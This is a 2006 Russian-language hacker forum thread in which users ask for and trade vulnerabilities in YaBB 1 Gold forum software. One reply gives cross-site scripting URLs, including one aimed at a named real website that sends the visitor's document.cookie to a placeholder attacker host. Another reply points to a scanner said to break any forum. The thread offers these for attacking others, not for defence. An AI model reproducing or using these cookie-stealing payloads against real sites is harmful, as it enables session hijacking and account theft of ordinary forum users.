Форум АНТИЧАТ - Уязвимости форума YaBB 1 Gold

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Уязвимости форума YaBB 1 Gold - Release и сплойты к нему (https://forum.antichat.xyz/showthread.php?t=12439)

asma2k

03.01.2006 21:20

Уязвимости форума YaBB 1 Gold - Release и сплойты к нему

Народ,хотелось бы узнать какие последние уязвимости этого форума есть и сплойты к нему?

А то по phpBB куча всякой инфы,а по YaBB 1 Gold я нашел мало,да и то какое то старье.

Может,кто что новое подскажет?

Romaxa55

05.01.2006 07:26

Да, там можно межсайтовый скриптинг произвести, вот пример:

Код:

http://host/cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert()</script>

Код:

http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display; 

num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d' 

%2b(document.cookie)%3b</Script>

P.S. прошу прощения за флуд.

WizART

05.01.2006 19:11

Цитата:

Код:

http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display; 

num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d' 

%2b(document.cookie)%3b</Script>

Эт ты где такую урлу надыбал?) :)

D1mOn

05.01.2006 19:18

это всё пасивные)))жаль

Romaxa55

05.01.2006 21:53

Цитата:

Сообщение от WizART

Эт ты где такую урлу надыбал?) :)

на секьюре лежала, там и надыбал, ведь он же не сообщил какой сайт именно, попросили уязвимости,Ю я и сообщил.

Ricky

06.01.2006 02:00

Цитата:

Сообщение от asma2k

http://forum.antichat.ru/thread11807.html

Возьми от сюда мануальный сканер, и проскань этот форум. Ни один форум еще от этого сканера не был защищен.

Время: 19:05